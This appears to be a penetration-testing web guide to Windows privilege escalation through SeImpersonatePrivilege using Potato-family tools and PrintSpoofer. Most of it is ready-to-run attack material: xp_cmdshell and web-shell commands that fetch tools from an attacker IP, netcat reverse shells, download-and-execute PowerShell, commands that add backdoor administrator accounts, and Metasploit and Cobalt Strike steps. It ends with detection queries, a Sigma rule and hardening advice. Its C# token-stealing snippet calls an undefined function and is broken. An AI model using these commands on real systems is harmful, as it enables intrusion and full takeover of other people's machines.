Vulnerability DescriptionsWindowsWindows Privilege Escalation via SeImpersonatePrivilege
SeImpersonatePrivilege exploitation for Windows privilege escalation

Windows Privilege Escalation via SeImpersonatePrivilege

Complete guide to abusing SeImpersonatePrivilege for local privilege escalation, covering JuicyPotato, PrintSpoofer, and modern token impersonation techniques.

Windows SecurityPrivilege EscalationToken ImpersonationJuicyPotatoPrintSpooferRed TeamPenetration TestingPost-ExploitationMSSQL

Introduction

SeImpersonatePrivilege is a powerful Windows user right that allows processes to impersonate other users' security contexts. While designed to enable legitimate services like IIS and SQL Server to perform actions on behalf of authenticated users, this privilege has become one of the most reliable paths to SYSTEM-level privilege escalation on Windows systems.

The privilege grants a process the ability to create tokens representing other users and use those tokens to access resources. When a service account possesses SeImpersonatePrivilege, attackers who compromise that account can leverage various techniques to escalate privileges to NT AUTHORITY\SYSTEM, the highest privilege level on Windows systems.

SeImpersonatePrivilege exploitation has evolved through several generations of attack tools. The original "Potato" family of exploits (Hot Potato, Rotten Potato, Juicy Potato) leveraged DCOM and NTLM reflection to obtain SYSTEM tokens. Modern tools like PrintSpoofer and RoguePotato adapted these techniques for newer Windows versions where the original methods were patched.

Service Account Gold Mine

SeImpersonatePrivilege is commonly found on service accounts for web servers (IIS), database servers (MSSQL), application servers, and automation frameworks (Jenkins, TeamCity). Compromising any of these services through web shells, SQL injection, or RCE vulnerabilities often provides immediate access to an account with this powerful privilege.

Technical Background

Windows Token Impersonation

Windows uses access tokens to represent the security context of a process or thread. Each token contains:

  • User and group Security Identifiers (SIDs)
  • Privilege information (SeDebugPrivilege, SeImpersonatePrivilege, etc.)
  • Session information
  • Integrity level
  • Logon session details

There are two primary token types:

  1. Primary tokens: Represent the security context of a process
  2. Impersonation tokens: Allow threads to execute under a different security context temporarily

Windows defines four impersonation levels:

  • Anonymous: The server cannot obtain identification information about the client
  • Identification: The server can obtain identity information but cannot impersonate
  • Impersonation: The server can impersonate the client's security context on the local system
  • Delegation: The server can impersonate the client's context on remote systems

SeImpersonatePrivilege Mechanics

The SeImpersonatePrivilege user right allows a process to:

  1. Create new tokens representing other users via CreateProcessWithTokenW() or CreateProcessAsUser()
  2. Adjust token privileges
  3. Impersonate tokens obtained through authentication callbacks
  4. Run code under different security contexts without knowing passwords

By default, SeImpersonatePrivilege is granted to:

  • Local Administrator accounts
  • Service accounts (running as Network Service, Local Service)
  • IIS application pool identities
  • SQL Server service accounts
  • Exchange server accounts

The Potato Attack Evolution

The Potato family exploits share a common attack pattern:

  1. Trick a SYSTEM process to connect to an attacker-controlled endpoint
  2. Capture or relay the SYSTEM authentication
  3. Obtain a SYSTEM token through the connection
  4. Impersonate the token using SeImpersonatePrivilege
  5. Execute code as SYSTEM

Each generation addressed specific Windows security improvements:

ToolWorks OnTechniqueStatus
Hot PotatoWindows 7-10 (2016)NBNS spoofing + WPAD proxyPatched
Rotten PotatoWindows 7-Server 2016DCOM + NTLM reflectionPatched
Juicy PotatoWindows 7-Server 2016DCOM + BITS NTLM relayPartially patched
Rogue PotatoWindows 10 1809+Rogue oxid resolver + socatActive
PrintSpooferWindows 10+, Server 2019+Print Spooler named pipeActive

Initial Enumeration

Checking for SeImpersonatePrivilege

Before exploitation, verify the current user possesses the required privilege:

# PowerShell method
whoami /priv

# Look for this line:
# SeImpersonatePrivilege        Impersonate a client after authentication        Enabled

# Check from C#/Beacon
execute-assembly Seatbelt.exe TokenPrivileges

# Automated check in post-exploitation framework
run post/windows/gather/enum_tokens

Example output showing SeImpersonatePrivilege:

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Identifying Service Context

Determine which service account context you're operating under:

# Current user information
whoami
# Example: nt service\mssql$sqlexpress01

# Check if running as service account
sc qc <service_name>

# List all service accounts on the system
Get-WmiObject Win32_Service | Select-Object Name, StartName, State | Format-Table -AutoSize

# Identify web application pools (IIS)
Import-Module WebAdministration
Get-IISAppPool | Select-Object Name, ProcessModel | Format-Table -AutoSize

Exploitation Techniques

JuicyPotato (Windows Server 2016 and below)

JuicyPotato exploits the DCOM activation service to obtain a SYSTEM token. It requires a valid CLSID for the target Windows version.

Upload JuicyPotato and Netcat

# From attacker machine
python3 -m http.server 8080

# On target via compromised service (e.g., MSSQL xp_cmdshell)
xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.14.5:8080/JuicyPotato.exe -OutFile C:\temp\jp.exe"'
xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.14.5:8080/nc.exe -OutFile C:\temp\nc.exe"'

Find a working CLSID

# Test a specific CLSID
.\jp.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID-HERE}

# Use default CLSID for Windows version
# Windows Server 2016: {e60687f7-01a1-40aa-86ac-db1cbf673334}
# Windows 10 Enterprise: {4991d34b-80a1-4291-83b6-3328366b9097}
# Windows 10 Professional: {4991d34b-80a1-4291-83b6-3328366b9097}
# Windows 8.1: {4991d34b-80a1-4291-83b6-3328366b9097}

Execute JuicyPotato for reverse shell

# Start listener on attack machine
nc -lvnp 4444

# Execute JuicyPotato with reverse shell payload
xp_cmdshell 'C:\temp\jp.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}'

Expected output on target:

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
[+] calling CreateProcessAsUserW

Verify SYSTEM access

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token  Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas           Enabled
SeSecurityPrivilege           Manage auditing and security   Enabled
SeTakeOwnershipPrivilege      Take ownership of files        Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeSystemProfilePrivilege      Profile system performance     Enabled
[...]

PrintSpoofer (Windows 10 1809+ / Server 2019+)

PrintSpoofer exploits the Print Spooler service's named pipe impersonation to obtain SYSTEM privileges. It works on systems where JuicyPotato fails.

Check Print Spooler service status

# Verify spooler is running
Get-Service -Name Spooler

# From MSSQL
xp_cmdshell 'sc query Spooler'

Upload and execute PrintSpoofer

# Download from: https://github.com/itm4n/PrintSpoofer/releases

# Upload to target
# Via MSSQL:
xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.14.5:8080/PrintSpoofer.exe -OutFile C:\temp\ps.exe"'

# Via web shell:
Invoke-WebRequest -Uri http://10.10.14.5:8080/PrintSpoofer.exe -OutFile C:\inetpub\wwwroot\ps.exe

Execute PrintSpoofer

# Method 1: Interactive command execution
.\PrintSpoofer.exe -i -c cmd

# Method 2: Reverse shell
.\PrintSpoofer.exe -c "C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe"

# Method 3: Add local administrator (stealthier for persistence)
.\PrintSpoofer.exe -c "net user hacker P@ssw0rd123! /add && net localgroup administrators hacker /add"

# Method 4: Execute PowerShell payload
.\PrintSpoofer.exe -c "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')"

Example output:

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

Catch reverse shell

# On attacker machine
nc -lvnp 4444

listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.45] 49826
Microsoft Windows [Version 10.0.19041.1415]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

RoguePotato (Alternative for Windows 10+)

RoguePotato uses a fake OXID resolver to redirect DCOM activation requests:

# Attacker machine setup (Linux)
# Start socat redirector
sudo socat tcp-listen:135,reuseaddr,fork tcp:TARGET_IP:9999

# On target Windows system
.\RoguePotato.exe -r 10.10.14.5 -e "C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe" -l 9999

GodPotato (Windows 10 / Server 2019-2022)

GodPotato is a newer variant that combines multiple techniques:

# Download: https://github.com/BeichenDream/GodPotato/releases

# Basic execution
.\GodPotato.exe -cmd "cmd /c whoami"

# Reverse shell
.\GodPotato.exe -cmd "C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe"

# Add local admin
.\GodPotato.exe -cmd "net user backdoor P@ssw0rd! /add & net localgroup administrators backdoor /add"

Exploitation Scenarios

Scenario 1: SQL Server via xp_cmdshell

Common in environments where SQL Server runs with elevated service accounts:

-- Enable xp_cmdshell if disabled
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Check current privileges
EXEC xp_cmdshell 'whoami /priv';

-- Upload PrintSpoofer
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.14.5/PrintSpoofer.exe -OutFile C:\temp\ps.exe"';

-- Execute for SYSTEM shell
EXEC xp_cmdshell 'C:\temp\ps.exe -c "C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe"';

From Linux using Impacket:

# Connect to MSSQL
mssqlclient.py sql_svc:[email protected] -windows-auth

# Enable xp_cmdshell
SQL> enable_xp_cmdshell

# Check privileges
SQL> xp_cmdshell whoami /priv

# Upload and execute PrintSpoofer
SQL> xp_cmdshell powershell -c "IWR -Uri http://10.10.14.5/PrintSpoofer.exe -OutFile C:\temp\ps.exe"
SQL> xp_cmdshell C:\temp\ps.exe -c "C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe"

Scenario 2: IIS Application Pool

Web shells uploaded to IIS applications often run under application pool identities with SeImpersonatePrivilege:

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
    void Page_Load(object sender, EventArgs e)
    {
        Process p = new Process();
        p.StartInfo.FileName = "C:\\inetpub\\wwwroot\\PrintSpoofer.exe";
        p.StartInfo.Arguments = "-c \"C:\\inetpub\\wwwroot\\nc.exe 10.10.14.5 4444 -e cmd.exe\"";
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.Start();
        Response.Write(p.StandardOutput.ReadToEnd());
        p.WaitForExit();
    }
</script>

PHP web shell exploitation:

<?php
system('whoami /priv');
system('C:\\inetpub\\wwwroot\\PrintSpoofer.exe -c "cmd /c net user hacker P@ss123! /add & net localgroup administrators hacker /add"');
?>

Scenario 3: Jenkins/TeamCity Build Agents

Build automation systems often run with service accounts:

// Jenkins Pipeline Script
node {
    stage('Exploit') {
        bat 'whoami /priv'
        bat 'C:\\tools\\PrintSpoofer.exe -c "powershell -ep bypass -c IEX(IWR http://10.10.14.5/payload.ps1)"'
    }
}

Scenario 4: Remote Services (WinRM, SSH)

# Via WinRM session
$s = New-PSSession -ComputerName target.domain.local -Credential $cred
Invoke-Command -Session $s -ScriptBlock {
    C:\temp\PrintSpoofer.exe -c "C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe"
}

# Via SSH (Windows 10 OpenSSH Server)
ssh [email protected]
C:\> whoami /priv
C:\> PrintSpoofer.exe -i -c cmd

Advanced Techniques

Token Stealing with C# Implant

Custom C# code for token impersonation:

using System;
using System.Runtime.InteropServices;

public class TokenStealer {
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool RevertToSelf();

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr GetCurrentProcess();

    public static void Main() {
        IntPtr hSystemToken = GetSystemToken();
        if (ImpersonateLoggedOnUser(hSystemToken)) {
            Console.WriteLine("[+] Impersonating SYSTEM token");
            System.Diagnostics.Process.Start("cmd.exe");
        }
    }
}

Cobalt Strike Integration

# Check for SeImpersonate
execute-assembly Seatbelt.exe TokenPrivileges

# Upload PrintSpoofer
upload /tools/PrintSpoofer.exe

# Execute for elevated beacon
execute-assembly PrintSpoofer.exe -c "C:\beacon_system.exe"

# Or use built-in elevate command
elevate printspoofer tcp-4444

Metasploit Integration

# Check privileges
getprivs

# Use built-in module
use exploit/windows/local/ms16_075_reflection_juicy
set SESSION 1
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
run

# Manual PrintSpoofer execution
execute -f C:\\temp\\PrintSpoofer.exe -a "-c C:\\temp\\payload.exe"

Detection and Prevention

Event Log Monitoring

Monitor for suspicious token impersonation activity:

Event ID 4624: Account Logon (Type 2 or 3 from service accounts)

<QueryList>
  <Query Id="0" Path="Security">
    <Select Path="Security">
      *[System[(EventID=4624)]]
      and
      *[EventData[Data[@Name='TargetUserName']='SYSTEM']]
      and
      *[EventData[Data[@Name='SubjectUserName']!='SYSTEM']]
    </Select>
  </Query>
</QueryList>

Event ID 4673: Sensitive Privilege Use

<QueryList>
  <Query Id="0" Path="Security">
    <Select Path="Security">
      *[System[(EventID=4673)]]
      and
      *[EventData[Data[@Name='PrivilegeList']='SeImpersonatePrivilege']]
    </Select>
  </Query>
</QueryList>

Event ID 4688: Process Creation from service accounts

# Look for unusual process chains from service accounts
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
    Where-Object {$_.Properties[5].Value -match 'NT SERVICE|IIS APPPOOL'} |
    Select-Object TimeCreated, @{N='Creator';E={$_.Properties[1].Value}}, @{N='Process';E={$_.Properties[5].Value}}

Preventive Measures

1. Remove SeImpersonatePrivilege from service accounts (if possible):

# Check current assignments
secedit /export /cfg C:\secpol.cfg
Get-Content C:\secpol.cfg | Select-String "SeImpersonatePrivilege"

# Use Group Policy to restrict:
# Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment
# "Impersonate a client after authentication" - Remove service accounts

2. Use Virtual Service Accounts or Group Managed Service Accounts:

# Create gMSA (domain controller)
New-ADServiceAccount -Name svc_web_gmsa -DNSHostName web01.domain.local -PrincipalsAllowedToRetrieveManagedPassword "Web Servers"

# Install gMSA on target server
Install-ADServiceAccount -Identity svc_web_gmsa

# Configure service to use gMSA
sc.exe config "ServiceName" obj= "DOMAIN\svc_web_gmsa$" password= ""

3. Enable Protected Process Light (PPL) for critical services:

# Protect LSASS from token theft
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "RunAsPPL" /t REG_DWORD /d 1 /f

# Requires UEFI Secure Boot to be effective

4. Implement Endpoint Detection and Response (EDR):

  • Monitor for suspicious tool execution (JuicyPotato, PrintSpoofer, etc.)
  • Alert on token manipulation APIs (ImpersonateLoggedOnUser, CreateProcessWithTokenW)
  • Track process creation chains from service accounts
  • Detect named pipe creation patterns used by exploits

5. Application Security Hardening:

<!-- IIS Application Pool isolation -->
<applicationPool name="SecureAppPool"
                 autoStart="true"
                 managedRuntimeVersion="v4.0">
  <processModel identityType="ApplicationPoolIdentity"
                loadUserProfile="false"
                setProfileEnvironment="false" />
</applicationPool>

<!-- SQL Server: Use Windows Authentication and least privilege -->
-- Create low-privilege account for application
CREATE LOGIN [DOMAIN\app_sql_user] FROM WINDOWS;
USE [ApplicationDB];
CREATE USER [DOMAIN\app_sql_user] FOR LOGIN [DOMAIN\app_sql_user];
ALTER ROLE db_datareader ADD MEMBER [DOMAIN\app_sql_user];
ALTER ROLE db_datawriter ADD MEMBER [DOMAIN\app_sql_user];

Behavioral Detection Rules

Sigma rule for PrintSpoofer execution:

title: PrintSpoofer Privilege Escalation
status: experimental
description: Detects the execution of PrintSpoofer tool for privilege escalation
references:
  - https://github.com/itm4n/PrintSpoofer
tags:
  - attack.privilege_escalation
  - attack.t1134
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith: '\PrintSpoofer.exe'
    - OriginalFileName: 'PrintSpoofer.exe'
  selection_cli:
    CommandLine|contains:
      - '-c '
      - '-i '
  condition: selection_img or selection_cli
falsepositives:
  - Legitimate administrative activities (rare)
level: high

Hunt query for token impersonation (Splunk):

index=windows EventCode=4688
| where match(Creator_Process_Name, "(?i)(w3wp|sqlservr|jenkins)")
| where match(New_Process_Name, "(?i)(cmd\.exe|powershell\.exe|nc\.exe)")
| stats count by Computer, Creator_Process_Name, New_Process_Name, Process_Command_Line
| where count > 1

Mitigation Checklist

  • Audit all accounts with SeImpersonatePrivilege
  • Transition service accounts to gMSAs where possible
  • Disable unnecessary services (Print Spooler, BITS) on non-print servers
  • Enable LSASS PPL protection
  • Implement EDR with token manipulation detection
  • Monitor Event IDs 4624, 4673, 4688 for service account anomalies
  • Harden application configurations (IIS, SQL Server)
  • Use application pool isolation and virtual accounts
  • Restrict administrative tool execution via AppLocker/WDAC
  • Regular penetration testing for token abuse vectors

References

Next Steps

If SeImpersonatePrivilege is identified during assessment:

  • Immediately verify the scope of service accounts with this privilege
  • Test exploitation using PrintSpoofer or appropriate tool for the target OS
  • Document all findings including service account names and affected systems
  • Recommend transition to Group Managed Service Accounts
  • Implement monitoring for Event IDs 4624, 4673, 4688 from service accounts
  • Explore related privilege escalation techniques:

Takeaway: SeImpersonatePrivilege represents one of the most reliable and consistent privilege escalation vectors on Windows systems. Service accounts across IIS, SQL Server, and automation frameworks commonly possess this privilege, making it a high-value target during post-exploitation. The combination of proper service account management, migration to gMSAs, comprehensive monitoring, and EDR deployment provides effective defense against this attack vector. Make token privilege security a critical component of your Windows hardening program.

Last updated on

PrintNightmare

PrintNightmare (CVE-2021-34527) exploitation guide covering RCE through print spooler, privilege escalation, and domain compromise techniques.

On this page

Introduction
Technical Background
Windows Token Impersonation
SeImpersonatePrivilege Mechanics
The Potato Attack Evolution
Initial Enumeration
Checking for SeImpersonatePrivilege
Identifying Service Context
Exploitation Techniques
JuicyPotato (Windows Server 2016 and below)
Upload JuicyPotato and Netcat
Find a working CLSID
Execute JuicyPotato for reverse shell
Verify SYSTEM access
PrintSpoofer (Windows 10 1809+ / Server 2019+)
Check Print Spooler service status
Upload and execute PrintSpoofer
Execute PrintSpoofer
Catch reverse shell
RoguePotato (Alternative for Windows 10+)
GodPotato (Windows 10 / Server 2019-2022)
Exploitation Scenarios
Scenario 1: SQL Server via xp_cmdshell
Scenario 2: IIS Application Pool
Scenario 3: Jenkins/TeamCity Build Agents
Scenario 4: Remote Services (WinRM, SSH)
Advanced Techniques
Token Stealing with C# Implant
Cobalt Strike Integration
Metasploit Integration
Detection and Prevention
Event Log Monitoring
Preventive Measures
Behavioral Detection Rules
Mitigation Checklist
References
Next Steps
Windows Privilege Escalation via SeImpersonatePrivilege | Drake Axelrod